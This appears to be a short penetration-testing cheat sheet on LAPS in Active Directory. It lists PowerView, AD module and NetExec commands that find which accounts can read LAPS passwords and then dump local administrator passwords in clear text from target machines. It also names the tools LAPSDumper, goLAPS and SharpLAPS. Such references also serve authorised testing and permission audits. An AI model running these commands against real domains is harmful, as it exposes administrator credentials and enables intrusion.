LAPS
On a computer, if LAPS is in use, a library AdmPwd.dll
can be found in the C:\Program Files\LAPS\CSE\
Users who can read LAPS passwords
Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectAceType -like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -match 'ReadProperty')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_}
OUs where LAPS is in use along with users who can read the passwords in clear text
# LAPS Module
Import-Module .\AdmPwd.PS.psd1
Find-AdmPwdExtendedRights -Identity OUDistinguishedName
# AD Module
.\Get-LapsPermissions.ps1
Read LAPS Passwords
# PowerView
Get-DomainObject-Identity<targetmachine$>| select -ExpandProperty ms-mcs-admpwd
# AD Module
Get-ADComputer -Identity <targetmachine> -Properties ms-mcs-admpwd | select -ExpandProperty ms-mcs-admpwd
# LAPS Module
Get-AdmPwdPassword -ComputerName <targetmachine>
LAPSDumper
goLAPS
NXC
nxc smb <ip> -u user-can-read-laps -p pass --laps
nxc winrm <ip> -u user-can-read-laps -p pass --laps
SharpLAPS
Last updated